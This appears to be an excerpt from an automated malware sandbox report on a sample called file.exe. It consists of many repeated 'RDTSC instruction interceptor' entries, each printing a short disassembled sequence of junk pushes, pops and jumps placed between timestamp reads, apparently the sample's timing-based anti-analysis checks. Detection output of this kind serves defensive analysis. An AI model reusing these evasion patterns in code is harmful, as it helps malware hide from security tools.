              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE39C1 second address: AE39C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE39C8 second address: AE39D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF315524BCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE97E1 second address: AE97EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9321 second address: AE9325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBE52 second address: AEBE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBE58 second address: AEBE95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C8h 0x00000007 jbe 00007FBF315524B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FBF315524C6h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBCD5 second address: AEBCEB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF3154D250h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA297 second address: AFA2A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF315524BCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDEB second address: AFCE07 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF3154D24Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FBF3154D246h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCE07 second address: AFCE0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC954 second address: AFC95D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC95D second address: AFC968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC968 second address: AFC986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D258h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05E14 second address: B05E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05E1A second address: B05E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBF3154D246h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05E26 second address: B05E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05E2B second address: B05E35 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF3154D24Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B090CF second address: B090E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FBF315524B6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B164BF second address: B164C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B164C5 second address: B164E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF315524C8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B164E1 second address: B164E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B164E7 second address: B164ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14DEE second address: B14E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FBF3154D246h 0x0000000d jnl 00007FBF3154D246h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jnp 00007FBF3154D246h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15344 second address: B15350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15350 second address: B15354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15354 second address: B15358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19F93 second address: B19FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FBF3154D24Ah 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19AFC second address: B19B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19B02 second address: B19B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27DE6 second address: B27DEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27C5D second address: B27CA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FBF3154D254h 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FBF3154D251h 0x00000016 jmp 00007FBF3154D252h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3541A second address: B35430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34FDE second address: B34FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34FE8 second address: B35004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 je 00007FBF315524DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF315524BCh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A61A second address: B4A62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jl 00007FBF3154D246h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A62A second address: B4A635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AA40 second address: B4AA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF72 second address: B4AF7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007FBF315524B6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0E1 second address: B4B109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF3154D251h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B109 second address: B4B127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B127 second address: B4B12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B12B second address: B4B152 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b ja 00007FBF315524B6h 0x00000011 jng 00007FBF315524B6h 0x00000017 jc 00007FBF315524B6h 0x0000001d popad 0x0000001e push edi 0x0000001f jne 00007FBF315524B6h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CB0F second address: B4CB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E31F second address: B4E348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF315524C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBF315524BBh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50E00 second address: B50E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50E06 second address: B50E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50EA0 second address: B50EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B526D5 second address: B526DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54405 second address: B54409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54409 second address: B5440F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5440F second address: B54436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FBF3154D246h 0x0000000d jg 00007FBF3154D246h 0x00000013 jmp 00007FBF3154D252h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53F73 second address: B53F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53F7B second address: B53F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53F7F second address: B53FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF315524C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jng 00007FBF315524E3h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53FA4 second address: B53FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FACF second address: A6FAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 je 00007FBF315524D3h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FCE2 second address: A6FCEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBF3154D246h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC02BB second address: 2CC02C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC02C1 second address: 2CC02FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBF3154D250h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov esi, edi 0x00000013 mov dx, 99B0h 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBF3154D251h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC02FF second address: 2CC0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0314 second address: 2CC031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC031A second address: 2CC031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC031E second address: 2CC032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC032E second address: 2CC0332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0332 second address: 2CC0338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0338 second address: 2CC033E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC033E second address: 2CC0342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0342 second address: 2CC035B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF315524BCh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC035B second address: 2CC0382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4CF94E64h 0x00000008 mov ebx, 6F2EECD0h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ecx, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBF3154D252h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0382 second address: 2CC0388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC0388 second address: 2CC038C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC03AD second address: 2CC03B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70725 second address: 4F7072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7072B second address: 4F7075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBF315524C2h 0x00000013 adc si, F098h 0x00000018 jmp 00007FBF315524BBh 0x0000001d popfd 0x0000001e mov dl, cl 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7075F second address: 4F70818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D252h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FBF3154D250h 0x0000000f push eax 0x00000010 jmp 00007FBF3154D24Bh 0x00000015 xchg eax, ecx 0x00000016 jmp 00007FBF3154D256h 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FBF3154D24Ch 0x00000024 add esi, 4C8BFFB8h 0x0000002a jmp 00007FBF3154D24Bh 0x0000002f popfd 0x00000030 jmp 00007FBF3154D258h 0x00000035 popad 0x00000036 push eax 0x00000037 pushfd 0x00000038 jmp 00007FBF3154D251h 0x0000003d and esi, 39558506h 0x00000043 jmp 00007FBF3154D251h 0x00000048 popfd 0x00000049 pop ecx 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70818 second address: 4F7081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7081C second address: 4F7082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7082F second address: 4F70879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBF315524C6h 0x00000013 or cx, 3068h 0x00000018 jmp 00007FBF315524BBh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70879 second address: 4F7087F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7087F second address: 4F70883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70883 second address: 4F7089D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7089D second address: 4F708A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F708A1 second address: 4F708A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F708A5 second address: 4F708AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F708AB second address: 4F708FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov edi, eax 0x0000000d movzx ecx, di 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007FBF3154D257h 0x0000001d and ax, BE6Eh 0x00000022 jmp 00007FBF3154D259h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F708FF second address: 4F70904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70904 second address: 4F7094F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 call 00007FBF3154D254h 0x0000000e jmp 00007FBF3154D252h 0x00000013 pop eax 0x00000014 mov di, 9006h 0x00000018 popad 0x00000019 push dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBF3154D24Fh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7094F second address: 4F70955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70976 second address: 4F7097C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7097C second address: 4F70980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7005B second address: 4F700B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D259h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBF3154D24Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FBF3154D250h 0x00000016 push FFFFFFFEh 0x00000018 pushad 0x00000019 movzx ecx, dx 0x0000001c mov di, 977Eh 0x00000020 popad 0x00000021 push 4E729B64h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FBF3154D24Ch 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F700B9 second address: 4F700C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F700C8 second address: 4F700CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
